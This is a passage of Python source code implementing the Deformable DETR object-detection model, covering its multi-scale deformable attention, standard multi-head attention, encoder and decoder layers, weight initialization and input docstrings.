    for level, (height, width) in enumerate(value_spatial_shapes):
        # (batch_size, H*W, num_heads, head_dim) -> (batch_size*num_heads, head_dim, H, W)
        level_value = (
            per_level_values[level].flatten(2).transpose(1, 2).reshape(batch_size * num_heads, head_dim, height, width)
        )
        # (batch_size, num_queries, num_heads, num_points, 2)
        # -> (batch_size*num_heads, num_queries, num_points, 2)
        level_grid = sampling_grids[:, :, :, level].transpose(1, 2).flatten(0, 1)
        # Bilinear sampling: (batch_size*num_heads, head_dim, num_queries, num_points)
        sampled.append(
            nn.functional.grid_sample(
                level_value, level_grid, mode="bilinear", padding_mode="zeros", align_corners=False
            )
        )
    # (batch_size, num_queries, num_heads, num_levels, num_points)
    # -> (batch_size*num_heads, 1, num_queries, num_levels*num_points)
    weights = attention_weights.transpose(1, 2).reshape(
        batch_size * num_heads, 1, num_queries, num_levels * num_points
    )
    weighted = (torch.stack(sampled, dim=-2).flatten(-2) * weights).sum(-1)
    output = weighted.view(batch_size, num_heads * head_dim, num_queries)
    return output.transpose(1, 2).contiguous()
class DeformableDetrMultiscaleDeformableAttention(nn.Module):
    """
    Multiscale deformable attention as proposed in Deformable DETR.

    Each query attends to `n_points` learned sampling locations per head and per feature
    level instead of the full key set. The forward pass tries the custom CUDA kernel and
    falls back to the pure-PyTorch implementation on any failure.
    """

    def __init__(self, embed_dim: int, num_heads: int, n_levels: int, n_points: int):
        super().__init__()
        if embed_dim % num_heads != 0:
            raise ValueError(
                f"embed_dim (d_model) must be divisible by num_heads, but got {embed_dim} and {num_heads}"
            )
        dim_per_head = embed_dim // num_heads
        # check if dim_per_head is power of 2
        if not ((dim_per_head & (dim_per_head - 1) == 0) and dim_per_head != 0):
            warnings.warn(
                "You'd better set embed_dim (d_model) in DeformableDetrMultiscaleDeformableAttention to make the"
                " dimension of each attention head a power of 2 which is more efficient in the authors' CUDA"
                " implementation."
            )

        # Batch chunk size used by the CUDA kernel.
        self.im2col_step = 64

        self.d_model = embed_dim
        self.n_levels = n_levels
        self.n_heads = num_heads
        self.n_points = n_points

        # Per query: 2D offsets and a scalar weight for every (head, level, point) triple.
        self.sampling_offsets = nn.Linear(embed_dim, num_heads * n_levels * n_points * 2)
        self.attention_weights = nn.Linear(embed_dim, num_heads * n_levels * n_points)
        self.value_proj = nn.Linear(embed_dim, embed_dim)
        self.output_proj = nn.Linear(embed_dim, embed_dim)

        self._reset_parameters()

    def _reset_parameters(self):
        # Initialize the sampling-offset bias so the initial points fan out per head in
        # evenly-spaced directions with increasing radius (as in the Deformable DETR paper);
        # the offset weights start at zero so this bias is the initial sampling pattern.
        nn.init.constant_(self.sampling_offsets.weight.data, 0.0)
        thetas = torch.arange(self.n_heads, dtype=torch.float32) * (2.0 * math.pi / self.n_heads)
        grid_init = torch.stack([thetas.cos(), thetas.sin()], -1)
        grid_init = (
            (grid_init / grid_init.abs().max(-1, keepdim=True)[0])
            .view(self.n_heads, 1, 1, 2)
            .repeat(1, self.n_levels, self.n_points, 1)
        )
        for i in range(self.n_points):
            grid_init[:, :, i, :] *= i + 1
        with torch.no_grad():
            self.sampling_offsets.bias = nn.Parameter(grid_init.view(-1))
        nn.init.constant_(self.attention_weights.weight.data, 0.0)
        nn.init.constant_(self.attention_weights.bias.data, 0.0)
        nn.init.xavier_uniform_(self.value_proj.weight.data)
        nn.init.constant_(self.value_proj.bias.data, 0.0)
        nn.init.xavier_uniform_(self.output_proj.weight.data)
        nn.init.constant_(self.output_proj.bias.data, 0.0)

    def with_pos_embed(self, tensor: torch.Tensor, position_embeddings: Optional[Tensor]):
        # Position information is added to the content features, not concatenated.
        return tensor if position_embeddings is None else tensor + position_embeddings

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.Tensor] = None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        position_embeddings: Optional[torch.Tensor] = None,
        reference_points=None,
        spatial_shapes=None,
        level_start_index=None,
        output_attentions: bool = False,
    ):
        # add position embeddings to the hidden states before projecting to queries and keys
        if position_embeddings is not None:
            hidden_states = self.with_pos_embed(hidden_states, position_embeddings)

        batch_size, num_queries, _ = hidden_states.shape
        batch_size, sequence_length, _ = encoder_hidden_states.shape
        # The flattened encoder sequence must cover exactly sum(H_l * W_l) positions.
        if (spatial_shapes[:, 0] * spatial_shapes[:, 1]).sum() != sequence_length:
            raise ValueError(
                "Make sure to align the spatial shapes with the sequence length of the encoder hidden states"
            )

        value = self.value_proj(encoder_hidden_states)
        if attention_mask is not None:
            # we invert the attention_mask
            value = value.masked_fill(~attention_mask[..., None], float(0))
        value = value.view(batch_size, sequence_length, self.n_heads, self.d_model // self.n_heads)
        sampling_offsets = self.sampling_offsets(hidden_states).view(
            batch_size, num_queries, self.n_heads, self.n_levels, self.n_points, 2
        )
        attention_weights = self.attention_weights(hidden_states).view(
            batch_size, num_queries, self.n_heads, self.n_levels * self.n_points
        )
        # Softmax over all (level, point) pairs jointly, then reshape back per level.
        attention_weights = F.softmax(attention_weights, -1).view(
            batch_size, num_queries, self.n_heads, self.n_levels, self.n_points
        )
        # batch_size, num_queries, n_heads, n_levels, n_points, 2
        if reference_points.shape[-1] == 2:
            # Reference points are (x, y) centers: normalize the offsets by each level's
            # spatial size so locations stay in [0, 1] coordinates.
            offset_normalizer = torch.stack([spatial_shapes[..., 1], spatial_shapes[..., 0]], -1)
            sampling_locations = (
                reference_points[:, :, None, :, None, :]
                + sampling_offsets / offset_normalizer[None, None, None, :, None, :]
            )
        elif reference_points.shape[-1] == 4:
            # Reference points are (x, y, w, h) boxes: scale the offsets by half the box size.
            sampling_locations = (
                reference_points[:, :, None, :, None, :2]
                + sampling_offsets / self.n_points * reference_points[:, :, None, :, None, 2:] * 0.5
            )
        else:
            raise ValueError(f"Last dim of reference_points must be 2 or 4, but got {reference_points.shape[-1]}")
        try:
            # custom kernel
            output = MultiScaleDeformableAttentionFunction.apply(
                value,
                spatial_shapes,
                level_start_index,
                sampling_locations,
                attention_weights,
                self.im2col_step,
            )
        except Exception:
            # PyTorch implementation
            output = multi_scale_deformable_attention(value, spatial_shapes, sampling_locations, attention_weights)
        output = self.output_proj(output)

        return output, attention_weights
class DeformableDetrMultiheadAttention(nn.Module):
    """
    Multi-headed attention from 'Attention Is All You Need' paper.

    Here, we add position embeddings to the queries and keys (as explained in the Deformable DETR paper).
    """

    def __init__(
        self,
        embed_dim: int,
        num_heads: int,
        dropout: float = 0.0,
        bias: bool = True,
    ):
        super().__init__()
        self.embed_dim = embed_dim
        self.num_heads = num_heads
        self.dropout = dropout
        self.head_dim = embed_dim // num_heads
        if self.head_dim * num_heads != self.embed_dim:
            raise ValueError(
                f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`:"
                f" {num_heads})."
            )
        self.scaling = self.head_dim**-0.5

        self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
        self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
        self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
        self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)

    def _shape(self, tensor: torch.Tensor, seq_len: int, batch_size: int):
        # (batch, seq, embed_dim) -> (batch, num_heads, seq, head_dim)
        return tensor.view(batch_size, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()

    def with_pos_embed(self, tensor: torch.Tensor, position_embeddings: Optional[Tensor]):
        """Add position embeddings to `tensor` if provided, otherwise return it unchanged."""
        return tensor if position_embeddings is None else tensor + position_embeddings

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.Tensor] = None,
        position_embeddings: Optional[torch.Tensor] = None,
        output_attentions: bool = False,
    ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:
        """Input shape: Batch x Time x Channel

        Args:
            hidden_states (`torch.FloatTensor` of shape `(batch_size, seq_len, embed_dim)`):
                Input to the attention layer.
            attention_mask (`torch.Tensor` of shape `(batch_size, seq_len)`, *optional*):
                Mask selected in `[0, 1]`; expanded internally to an additive 4D mask.
            position_embeddings (`torch.FloatTensor`, *optional*):
                Added to queries and keys (but *not* values) before projection.
            output_attentions (`bool`, *optional*, defaults to `False`):
                Whether to also return the per-head attention weights.

        Returns:
            `(attn_output, attn_weights)` where `attn_weights` is `None` unless `output_attentions=True`.
        """
        batch_size, target_len, embed_dim = hidden_states.size()
        # Values are always projected from the position-free hidden states.
        # Bug fix: previously `hidden_states_original` was only assigned inside the
        # `position_embeddings is not None` branch, causing a NameError when no
        # position embeddings were passed.
        hidden_states_original = hidden_states
        # add position embeddings to the hidden states before projecting to queries and keys
        if position_embeddings is not None:
            hidden_states = self.with_pos_embed(hidden_states, position_embeddings)

        # get queries, keys and values
        query_states = self.q_proj(hidden_states) * self.scaling
        key_states = self._shape(self.k_proj(hidden_states), -1, batch_size)
        value_states = self._shape(self.v_proj(hidden_states_original), -1, batch_size)

        # collapse batch and head dimensions for batched matmul
        proj_shape = (batch_size * self.num_heads, -1, self.head_dim)
        query_states = self._shape(query_states, target_len, batch_size).view(*proj_shape)
        key_states = key_states.view(*proj_shape)
        value_states = value_states.view(*proj_shape)

        source_len = key_states.size(1)

        attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))

        if attn_weights.size() != (batch_size * self.num_heads, target_len, source_len):
            raise ValueError(
                f"Attention weights should be of size {(batch_size * self.num_heads, target_len, source_len)}, but is"
                f" {attn_weights.size()}"
            )

        # expand attention_mask
        if attention_mask is not None:
            # [batch_size, seq_len] -> [batch_size, 1, target_seq_len, source_seq_len]
            attention_mask = _expand_mask(attention_mask, hidden_states.dtype)

        if attention_mask is not None:
            if attention_mask.size() != (batch_size, 1, target_len, source_len):
                raise ValueError(
                    f"Attention mask should be of size {(batch_size, 1, target_len, source_len)}, but is"
                    f" {attention_mask.size()}"
                )
            attn_weights = attn_weights.view(batch_size, self.num_heads, target_len, source_len) + attention_mask
            attn_weights = attn_weights.view(batch_size * self.num_heads, target_len, source_len)

        attn_weights = nn.functional.softmax(attn_weights, dim=-1)

        if output_attentions:
            # this operation is a bit awkward, but it's required to
            # make sure that attn_weights keeps its gradient.
            # In order to do so, attn_weights have to reshaped
            # twice and have to be reused in the following
            attn_weights_reshaped = attn_weights.view(batch_size, self.num_heads, target_len, source_len)
            attn_weights = attn_weights_reshaped.view(batch_size * self.num_heads, target_len, source_len)
        else:
            attn_weights_reshaped = None

        attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training)

        attn_output = torch.bmm(attn_probs, value_states)

        if attn_output.size() != (batch_size * self.num_heads, target_len, self.head_dim):
            raise ValueError(
                f"`attn_output` should be of size {(batch_size, self.num_heads, target_len, self.head_dim)}, but is"
                f" {attn_output.size()}"
            )

        # (batch*heads, tgt, head_dim) -> (batch, tgt, embed_dim)
        attn_output = attn_output.view(batch_size, self.num_heads, target_len, self.head_dim)
        attn_output = attn_output.transpose(1, 2)
        attn_output = attn_output.reshape(batch_size, target_len, embed_dim)

        attn_output = self.out_proj(attn_output)

        return attn_output, attn_weights_reshaped
class DeformableDetrEncoderLayer(nn.Module):
    """One encoder layer: multi-scale deformable self-attention followed by a two-layer feed-forward block."""

    def __init__(self, config: DeformableDetrConfig):
        super().__init__()
        self.embed_dim = config.d_model
        self.self_attn = DeformableDetrMultiscaleDeformableAttention(
            embed_dim=self.embed_dim,
            num_heads=config.encoder_attention_heads,
            n_levels=config.num_feature_levels,
            n_points=config.encoder_n_points,
        )
        self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
        self.dropout = config.dropout
        self.activation_fn = ACT2FN[config.activation_function]
        self.activation_dropout = config.activation_dropout
        self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim)
        self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim)
        self.final_layer_norm = nn.LayerNorm(self.embed_dim)

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: torch.Tensor,
        position_embeddings: torch.Tensor = None,
        reference_points=None,
        spatial_shapes=None,
        level_start_index=None,
        output_attentions: bool = False,
    ):
        """
        Args:
            hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
                Flattened multi-scale feature maps fed into the layer.
            attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`):
                Attention mask over the flattened feature maps.
            position_embeddings (`torch.FloatTensor`, *optional*):
                Position embeddings added to `hidden_states` inside the attention module.
            reference_points (`torch.FloatTensor`, *optional*):
                Reference points for the deformable attention sampling.
            spatial_shapes (`torch.LongTensor`, *optional*):
                Spatial shapes of the backbone feature maps.
            level_start_index (`torch.LongTensor`, *optional*):
                Start index of each feature level in the flattened sequence.
            output_attentions (`bool`, *optional*):
                Whether to also return the attention weights of this layer.
        """
        # --- deformable self-attention over the multi-scale feature maps ---
        shortcut = hidden_states
        hidden_states, attn_weights = self.self_attn(
            hidden_states=hidden_states,
            attention_mask=attention_mask,
            encoder_hidden_states=hidden_states,
            encoder_attention_mask=attention_mask,
            position_embeddings=position_embeddings,
            reference_points=reference_points,
            spatial_shapes=spatial_shapes,
            level_start_index=level_start_index,
            output_attentions=output_attentions,
        )
        hidden_states = shortcut + nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        hidden_states = self.self_attn_layer_norm(hidden_states)

        # --- position-wise feed-forward network ---
        shortcut = hidden_states
        hidden_states = self.activation_fn(self.fc1(hidden_states))
        hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
        hidden_states = self.fc2(hidden_states)
        hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        hidden_states = self.final_layer_norm(shortcut + hidden_states)

        # During (mixed-precision) training the residual stream can overflow; clamp it back into range.
        if self.training and (torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any()):
            clamp_value = torch.finfo(hidden_states.dtype).max - 1000
            hidden_states = torch.clamp(hidden_states, min=-clamp_value, max=clamp_value)

        if output_attentions:
            return (hidden_states, attn_weights)
        return (hidden_states,)
class DeformableDetrDecoderLayer(nn.Module):
    """One decoder layer: query self-attention, deformable cross-attention into the encoder output, then an FFN."""

    def __init__(self, config: DeformableDetrConfig):
        super().__init__()
        self.embed_dim = config.d_model
        # self-attention
        self.self_attn = DeformableDetrMultiheadAttention(
            embed_dim=self.embed_dim,
            num_heads=config.decoder_attention_heads,
            dropout=config.attention_dropout,
        )
        self.dropout = config.dropout
        self.activation_fn = ACT2FN[config.activation_function]
        self.activation_dropout = config.activation_dropout
        self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
        # cross-attention
        self.encoder_attn = DeformableDetrMultiscaleDeformableAttention(
            embed_dim=self.embed_dim,
            num_heads=config.decoder_attention_heads,
            n_levels=config.num_feature_levels,
            n_points=config.decoder_n_points,
        )
        self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim)
        # feedforward neural networks
        self.fc1 = nn.Linear(self.embed_dim, config.decoder_ffn_dim)
        self.fc2 = nn.Linear(config.decoder_ffn_dim, self.embed_dim)
        self.final_layer_norm = nn.LayerNorm(self.embed_dim)

    def forward(
        self,
        hidden_states: torch.Tensor,
        position_embeddings: Optional[torch.Tensor] = None,
        reference_points=None,
        spatial_shapes=None,
        level_start_index=None,
        encoder_hidden_states: Optional[torch.Tensor] = None,
        encoder_attention_mask: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = False,
    ):
        """
        Args:
            hidden_states (`torch.FloatTensor` of shape `(batch_size, num_queries, embed_dim)`):
                Object query features entering the layer.
            position_embeddings (`torch.FloatTensor`, *optional*):
                Added to queries and keys in the self-attention layer (and forwarded to cross-attention).
            reference_points (`torch.FloatTensor`, *optional*):
                Reference points for deformable cross-attention sampling.
            spatial_shapes (`torch.LongTensor`, *optional*):
                Spatial shapes of the encoder feature maps.
            level_start_index (`torch.LongTensor`, *optional*):
                Start index of each feature level in the flattened encoder sequence.
            encoder_hidden_states (`torch.FloatTensor`, *optional*):
                Encoder output the queries cross-attend into.
            encoder_attention_mask (`torch.FloatTensor`, *optional*):
                Mask over the encoder output; padding positions carry very large negative values.
            output_attentions (`bool`, *optional*):
                Whether to also return the self- and cross-attention weights.
        """
        # 1) self-attention among the object queries
        shortcut = hidden_states
        hidden_states, self_attn_weights = self.self_attn(
            hidden_states=hidden_states,
            position_embeddings=position_embeddings,
            output_attentions=output_attentions,
        )
        hidden_states = shortcut + nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        hidden_states = self.self_attn_layer_norm(hidden_states)

        # 2) deformable cross-attention into the encoder feature maps
        shortcut = hidden_states
        hidden_states, cross_attn_weights = self.encoder_attn(
            hidden_states=hidden_states,
            attention_mask=encoder_attention_mask,
            encoder_hidden_states=encoder_hidden_states,
            encoder_attention_mask=encoder_attention_mask,
            position_embeddings=position_embeddings,
            reference_points=reference_points,
            spatial_shapes=spatial_shapes,
            level_start_index=level_start_index,
            output_attentions=output_attentions,
        )
        hidden_states = shortcut + nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        hidden_states = self.encoder_attn_layer_norm(hidden_states)

        # 3) position-wise feed-forward network
        shortcut = hidden_states
        hidden_states = self.activation_fn(self.fc1(hidden_states))
        hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
        hidden_states = self.fc2(hidden_states)
        hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        hidden_states = self.final_layer_norm(shortcut + hidden_states)

        if output_attentions:
            return (hidden_states, self_attn_weights, cross_attn_weights)
        return (hidden_states,)
# Copied from transformers.models.detr.modeling_detr.DetrClassificationHead
class DeformableDetrClassificationHead(nn.Module):
    """Head for sentence-level classification tasks."""

    def __init__(self, input_dim: int, inner_dim: int, num_classes: int, pooler_dropout: float):
        super().__init__()
        self.dense = nn.Linear(input_dim, inner_dim)
        self.dropout = nn.Dropout(p=pooler_dropout)
        self.out_proj = nn.Linear(inner_dim, num_classes)

    def forward(self, hidden_states: torch.Tensor):
        # dropout -> dense -> tanh -> dropout -> final projection
        features = self.dropout(hidden_states)
        features = torch.tanh(self.dense(features))
        return self.out_proj(self.dropout(features))
class DeformableDetrPreTrainedModel(PreTrainedModel):
    """Base class providing weight initialization and gradient-checkpointing plumbing for Deformable DETR models."""

    config_class = DeformableDetrConfig
    base_model_prefix = "model"
    main_input_name = "pixel_values"

    def _init_weights(self, module):
        """Initialize the weights of a single submodule; invoked for every submodule by `post_init`."""
        std = self.config.init_std

        if isinstance(module, DeformableDetrLearnedPositionEmbedding):
            # Learned 2D position embeddings start from a uniform distribution.
            nn.init.uniform_(module.row_embeddings.weight)
            nn.init.uniform_(module.column_embeddings.weight)
        elif isinstance(module, DeformableDetrMultiscaleDeformableAttention):
            # The deformable attention module defines its own specialized reset scheme.
            module._reset_parameters()
        elif isinstance(module, (nn.Linear, nn.Conv2d, nn.BatchNorm2d)):
            # Slightly different from the TF version which uses truncated_normal for initialization
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=std)
            if module.bias is not None:
                module.bias.data.zero_()
        elif isinstance(module, nn.Embedding):
            module.weight.data.normal_(mean=0.0, std=std)
            if module.padding_idx is not None:
                module.weight.data[module.padding_idx].zero_()
        # The following checks run in addition to the isinstance dispatch above:
        if hasattr(module, "reference_points") and not self.config.two_stage:
            # Single-stage variant: linear layer predicting the initial 2D reference points.
            nn.init.xavier_uniform_(module.reference_points.weight.data, gain=1.0)
            nn.init.constant_(module.reference_points.bias.data, 0.0)
        if hasattr(module, "level_embed"):
            # Per-feature-level embedding added to the flattened feature maps.
            nn.init.normal_(module.level_embed)

    def _set_gradient_checkpointing(self, module, value=False):
        # Gradient checkpointing is only toggled on the decoder.
        if isinstance(module, DeformableDetrDecoder):
            module.gradient_checkpointing = value
DEFORMABLE_DETR_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`DeformableDetrConfig`]):
Model configuration class with all the parameters of the model. Initializing with a config file does not
load the weights associated with the model, only the configuration. Check out the
[`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
DEFORMABLE_DETR_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Padding will be ignored by default should you provide it.
Pixel values can be obtained using [`AutoImageProcessor`]. See [`DeformableDetrImageProcessor.__call__`]
for details.
pixel_mask (`torch.LongTensor` of shape `(batch_size, height, width)`, *optional*):
Mask to avoid performing attention on padding pixel values. Mask values selected in `[0, 1]`:
- 1 for pixels that are real (i.e. **not masked**),
- 0 for pixels that are padding (i.e. **masked**).
[What are attention masks?](../glossary#attention-mask)
decoder_attention_mask (`torch.LongTensor` of shape `(batch_size, num_queries)`, *optional*):
Not used by default. Can be used to mask object queries.
encoder_outputs (`tuple(tuple(torch.FloatTensor)`, *optional*):
Tuple consists of (`last_hidden_state`, *optional*: `hidden_states`, *optional*: `attentions`)
`last_hidden_state` of shape `(batch_size, sequence_length, hidden_size)`, *optional*) is a sequence of
hidden-states at the output of the last layer of the encoder. Used in the cross-attention of the decoder.
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing the flattened feature map (output of the backbone + projection layer), you
can choose to directly pass a flattened representation of an image.
decoder_inputs_embeds (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`, *optional*):
Optionally, instead of initializing the queries with a tensor of zeros, you can choose to directly pass an
embedded representation.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple.
"""
class DeformableDetrEncoder(DeformableDetrPreTrainedModel):
    """
    Transformer encoder consisting of *config.encoder_layers* deformable attention layers. Each layer is a
    [`DeformableDetrEncoderLayer`].

    The encoder updates the flattened multi-scale feature maps through multiple deformable attention layers.

    Args:
        config: DeformableDetrConfig
    """

    def __init__(self, config: DeformableDetrConfig):
        super().__init__(config)

        self.dropout = config.dropout
        self.layers = nn.ModuleList([DeformableDetrEncoderLayer(config) for _ in range(config.encoder_layers)])

        # Initialize weights and apply final processing
        self.post_init()

    @staticmethod
    def get_reference_points(spatial_shapes, valid_ratios, device):
        """
        Get reference points for each feature map. Used in decoder.

        Args:
            spatial_shapes (`torch.LongTensor` of shape `(num_feature_levels, 2)`):
                Spatial shapes of each feature map.
            valid_ratios (`torch.FloatTensor` of shape `(batch_size, num_feature_levels, 2)`):
                Valid ratios of each feature map.
            device (`torch.device`):
                Device on which to create the tensors.

        Returns:
            `torch.FloatTensor` of shape `(batch_size, num_queries, num_feature_levels, 2)`
        """
        reference_points_list = []
        for level, (height, width) in enumerate(spatial_shapes):
            # Pixel-center coordinates of this level's feature map, normalized by the valid area.
            ref_y, ref_x = meshgrid(
                torch.linspace(0.5, height - 0.5, height, dtype=torch.float32, device=device),
                torch.linspace(0.5, width - 0.5, width, dtype=torch.float32, device=device),
                indexing="ij",
            )
            # TODO: valid_ratios could be useless here. check https://github.com/fundamentalvision/Deformable-DETR/issues/36
            ref_y = ref_y.reshape(-1)[None] / (valid_ratios[:, None, level, 1] * height)
            ref_x = ref_x.reshape(-1)[None] / (valid_ratios[:, None, level, 0] * width)
            ref = torch.stack((ref_x, ref_y), -1)
            reference_points_list.append(ref)
        # Concatenate all levels along the query axis, then scale by the per-level valid ratios.
        reference_points = torch.cat(reference_points_list, 1)
        reference_points = reference_points[:, :, None] * valid_ratios[:, None]
        return reference_points

    def forward(
        self,
        inputs_embeds=None,
        attention_mask=None,
        position_embeddings=None,
        spatial_shapes=None,
        level_start_index=None,
        valid_ratios=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        r"""
        Args:
            inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
                Flattened feature map (output of the backbone + projection layer) that is passed to the encoder.
            attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
                Mask to avoid performing attention on padding pixel features. Mask values selected in `[0, 1]`:
                - 1 for pixel features that are real (i.e. **not masked**),
                - 0 for pixel features that are padding (i.e. **masked**).
                [What are attention masks?](../glossary#attention-mask)
            position_embeddings (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
                Position embeddings that are added to the queries and keys in each self-attention layer.
            spatial_shapes (`torch.LongTensor` of shape `(num_feature_levels, 2)`):
                Spatial shapes of each feature map.
            level_start_index (`torch.LongTensor` of shape `(num_feature_levels)`):
                Starting index of each feature map.
            valid_ratios (`torch.FloatTensor` of shape `(batch_size, num_feature_levels, 2)`):
                Ratio of valid area in each feature level.
            output_attentions (`bool`, *optional*):
                Whether or not to return the attentions tensors of all attention layers. See `attentions` under
                returned tensors for more detail.
            output_hidden_states (`bool`, *optional*):
                Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
                for more detail.
            return_dict (`bool`, *optional*):
                Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple.
        """
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        hidden_states = inputs_embeds
        hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)

        # Reference points are shared by every encoder layer.
        reference_points = self.get_reference_points(spatial_shapes, valid_ratios, device=inputs_embeds.device)

        encoder_states = () if output_hidden_states else None
        all_attentions = () if output_attentions else None
        # Idiom fix: the index from `enumerate` was never used, so iterate the layers directly.
        for encoder_layer in self.layers:
            if output_hidden_states:
                encoder_states = encoder_states + (hidden_states,)
            layer_outputs = encoder_layer(
                hidden_states,
                attention_mask,
                position_embeddings=position_embeddings,
                reference_points=reference_points,
                spatial_shapes=spatial_shapes,
                level_start_index=level_start_index,
                output_attentions=output_attentions,
            )

            hidden_states = layer_outputs[0]

            if output_attentions:
                all_attentions = all_attentions + (layer_outputs[1],)

        if output_hidden_states:
            encoder_states = encoder_states + (hidden_states,)

        if not return_dict:
            return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None)
        return BaseModelOutput(
            last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions
        )
class DeformableDetrDecoder(DeformableDetrPreTrainedModel):
    """
    Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a [`DeformableDetrDecoderLayer`].

    The decoder updates the query embeddings through multiple self-attention and cross-attention layers.

    Some tweaks for Deformable DETR:

    - `position_embeddings`, `reference_points`, `spatial_shapes` and `valid_ratios` are added to the forward pass.
    - it also returns a stack of intermediate outputs and reference points from all decoding layers.

    Args:
        config: DeformableDetrConfig
    """

    def __init__(self, config: DeformableDetrConfig):
        super().__init__(config)

        self.dropout = config.dropout
        self.layers = nn.ModuleList([DeformableDetrDecoderLayer(config) for _ in range(config.decoder_layers)])
        self.gradient_checkpointing = False

        # hack implementation for iterative bounding box refinement and two-stage Deformable DETR
        # (these are assigned from outside by the detection model when those features are enabled)
        self.bbox_embed = None
        self.class_embed = None

        # Initialize weights and apply final processing
        self.post_init()

    def forward(
        self,
        inputs_embeds=None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        position_embeddings=None,
        reference_points=None,
        spatial_shapes=None,
        level_start_index=None,
        valid_ratios=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        r"""
        Args:
            inputs_embeds (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`):
                The query embeddings that are passed into the decoder.
            encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
                Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
                of the decoder.
            encoder_attention_mask (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
                Mask to avoid performing cross-attention on padding pixel_values of the encoder. Mask values selected
                in `[0, 1]`:
                - 1 for pixels that are real (i.e. **not masked**),
                - 0 for pixels that are padding (i.e. **masked**).
            position_embeddings (`torch.FloatTensor` of shape `(batch_size, num_queries, hidden_size)`, *optional*):
                Position embeddings that are added to the queries and keys in each self-attention layer.
            reference_points (`torch.FloatTensor` of shape `(batch_size, num_queries, 4)` is `as_two_stage` else `(batch_size, num_queries, 2)` or , *optional*):
                Reference point in range `[0, 1]`, top-left (0,0), bottom-right (1, 1), including padding area.
            spatial_shapes (`torch.FloatTensor` of shape `(num_feature_levels, 2)`):
                Spatial shapes of the feature maps.
            level_start_index (`torch.LongTensor` of shape `(num_feature_levels)`, *optional*):
                Indexes for the start of each feature level. In range `[0, sequence_length]`.
            valid_ratios (`torch.FloatTensor` of shape `(batch_size, num_feature_levels, 2)`, *optional*):
                Ratio of valid area in each feature level.
            output_attentions (`bool`, *optional*):
                Whether or not to return the attentions tensors of all attention layers. See `attentions` under
                returned tensors for more detail.
            output_hidden_states (`bool`, *optional*):
                Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
                for more detail.
            return_dict (`bool`, *optional*):
                Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple.
        """
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
